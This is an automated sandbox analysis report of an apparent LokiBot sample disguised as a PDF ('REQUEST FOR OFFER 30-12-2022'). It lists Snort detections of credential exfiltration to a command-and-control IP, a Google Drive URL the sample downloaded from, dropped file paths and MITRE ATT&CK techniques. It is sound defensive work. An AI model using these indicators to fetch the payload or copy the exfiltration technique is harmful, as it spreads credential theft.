Opcode ID: 341e7ee84bcdc7f0b1e2b0de18a1fa4ad3025c5f4b8e17b8a23dd214e6b1753e
Instruction ID: 14c20cf8acc8d2e39f1816c914feeca0324c97aae83bf88db115bfa5f8cf1118
Opcode Fuzzy Hash: 341e7ee84bcdc7f0b1e2b0de18a1fa4ad3025c5f4b8e17b8a23dd214e6b1753e
Instruction Fuzzy Hash: E1118CB17277139F9B034E6C9DC17AA6909CF976B4718833AD892C72F3C750C0478661

Uniqueness

Uniqueness Score: -1.00%

Function 01680E25 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 233
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32 ref: 01680E2F

Strings

=Mv, xrefs: 01680F2B
GDhd, xrefs: 016613C5
=Mv, xrefs: 01680F30

Memory Dump Source

Source File: 00000005.00000002.54390766320.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1660000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: TerminateThread
String ID: =Mv$=Mv$GDhd
API String ID: 1852365436-3884879240
Opcode ID: 83696c263e94805602b96896126df8a9704aac6ba2336222d9c1bdaddaadd9c4
Instruction ID: 29c376e221e849df42e2bca52c70cc6a28cb3767b388b34a98fab02f49984b93
Opcode Fuzzy Hash: 83696c263e94805602b96896126df8a9704aac6ba2336222d9c1bdaddaadd9c4
Instruction Fuzzy Hash: 4E61D2359153978FDB225F689C907D57BAACF87260F45425ECCD09B193D3248887CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01681418 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 110sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 01681427

Strings

GDhd, xrefs: 016613C5

Memory Dump Source

Source File: 00000005.00000002.54390766320.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1660000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: Sleep
String ID: GDhd
API String ID: 3472027048-3085950570
Opcode ID: d96303922b63e5cb4c59b48fa54bbf86dff0c23b1c457f6782ba569bd109fd04
Instruction ID: a21966a598e75b325e4b120d838c4e3f5f452a6c5bf8e5561c7000d6a9809676
Opcode Fuzzy Hash: d96303922b63e5cb4c59b48fa54bbf86dff0c23b1c457f6782ba569bd109fd04
Instruction Fuzzy Hash: 3F318DB45027129FE7026F78C889796BB599F0A3B4F45865DD991DB1B3C3618082CB25

Uniqueness

Uniqueness Score: -1.00%

Function 01681431 Relevance: 1.3, APIs: 1, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000005), ref: 01681427

Memory Dump Source

Source File: 00000005.00000002.54390766320.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1660000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d7776441390e0799efdfb8cf58d2fa60aff70929938540e6f5dcb9d9aa7aa84c
Instruction ID: 42cc2d243b775672a2aa775bb64372daf2a61ebecabbcc4e0c48d2273f878445
Opcode Fuzzy Hash: d7776441390e0799efdfb8cf58d2fa60aff70929938540e6f5dcb9d9aa7aa84c
Instruction Fuzzy Hash: C9218B754013019FEB006E38C9CD7D7BB65AF1A3A4F868649ED925F0B7D3718082CA15

Uniqueness

Uniqueness Score: -1.00%

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.11.20:49838 -> 157.245.36.27:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49838 -> 157.245.36.27:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.11.20:49838 -> 157.245.36.27:80

Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54362021539.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54356420593.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392699460.0000000001943000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr	String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr	String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54362021539.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54356420593.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392699460.0000000001943000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.gopher.ftp://ftp.
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204053166.0000000000626000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54203683114.00000000005F2000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54203683114.00000000005F2000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54356841847.0000000001984000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392074084.0000000001919000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54362021539.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391896205.0000000001901000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392699460.0000000001943000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0g-8k-docs.googleusercontent.com/
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391896205.0000000001901000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0g-8k-docs.googleusercontent.com/%%doc-0g-8k-docs.googleusercontent.com
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391896205.0000000001901000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0g-8k-docs.googleusercontent.com/)
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54362021539.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54356420593.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392699460.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392074084.0000000001919000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0g-8k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/65eu063p
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391638858.00000000018E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391291036.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393764611.0000000001C10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1ZppbncXCwboWfcBo0A5zlqzevMjFwzpW
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391291036.00000000018B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1ZppbncXCwboWfcBo0A5zlqzevMjFwzpWr
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54363023216.000000001D4A0000.00000004.00001000.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54363172732.000000001D4AA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54363172732.000000001D4AA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54363172732.000000001D4AA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54363172732.000000001D4AA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836

Source: unknown	TCP traffic detected without corresponding DNS query: 157.245.36.27
Source: unknown	TCP traffic detected without corresponding DNS query: 157.245.36.27
Source: unknown	TCP traffic detected without corresponding DNS query: 157.245.36.27
Source: unknown	TCP traffic detected without corresponding DNS query: 157.245.36.27
Source: unknown	TCP traffic detected without corresponding DNS query: 157.245.36.27
Source: unknown	TCP traffic detected without corresponding DNS query: 157.245.36.27
Source: unknown	TCP traffic detected without corresponding DNS query: 157.245.36.27
Source: unknown	TCP traffic detected without corresponding DNS query: 157.245.36.27
Source: unknown	TCP traffic detected without corresponding DNS query: 157.245.36.27
Source: unknown	TCP traffic detected without corresponding DNS query: 157.245.36.27
Source: unknown	TCP traffic detected without corresponding DNS query: 157.245.36.27
Source: unknown	TCP traffic detected without corresponding DNS query: 157.245.36.27
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane\AsOpenFile.exe

C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane\Tusindtallig.Syn

C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane\prowl.Dgn

C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll

C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6eb

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Function 0040344A Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 401
stringfilecomCOMMON

Function 004054B0 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Function 00405A03 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 004068DA Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 00406555 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 0040287E Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Function 00403DFE Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 00403A5B Relevance: 49.2, APIs: 14, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402ED5 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 00406234 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 00405371 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 00402660 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Function 00405840 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Function 0040657C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 004023EA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
registrystringCOMMON

Function 00405E16 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
